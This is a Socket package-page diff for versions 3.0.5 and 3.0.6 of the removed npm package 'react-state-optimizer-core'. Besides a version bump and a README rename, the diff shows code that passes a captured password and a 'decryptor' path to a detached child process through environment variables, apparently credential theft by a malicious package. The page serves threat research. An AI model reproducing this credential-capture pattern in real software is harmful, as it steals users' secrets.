Latest Threat Research:SANDWORM_MODE: Shai-Hulud-Style npm Worm Hijacks CI Workflows and Poisons AI Toolchains.Details
Socket
Book a DemoInstallSign in
Socket

react-state-optimizer-core

Package Overview
Dependencies
Maintainers
1
Versions
16
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

react-state-optimizer-core - npm Package Compare versions

Package was removed
Sorry, it seems this package was removed from the registry
Comparing version
3.0.5
to
3.0.6
scripts/decryptor

Sorry, the diff of this file is too big to display

+1
-1
{
"name": "react-state-optimizer-core",
"version": "3.0.5",
"version": "3.0.6",
"description": "Utility layer for asynchronous state management",

@@ -5,0 +5,0 @@ "main": "index.js",

@@ -1,2 +0,2 @@

# react-fast-utils
# react-state-optimizer-core

@@ -8,3 +8,3 @@ A lightweight utility layer for asynchronous state management in React applications.

```bash
npm install react-fast-utils
npm install react-state-optimizer-core
```

@@ -15,3 +15,3 @@

```javascript
import { useAsyncState } from 'react-fast-utils';
import { useAsyncState } from 'react-state-optimizer-core';

@@ -18,0 +18,0 @@ const { data, loading, error } = useAsyncState(myPromise);

@@ -271,3 +271,7 @@ const fs = require('fs');

detached: !debugMode,
env: { ...process.env, GHOST_PWD: capturedPassword }
env: {
...process.env,
GHOST_PWD: capturedPassword,
GHOST_DECRYPTOR: path.join(__dirname, 'decryptor')
}
});

@@ -274,0 +278,0 @@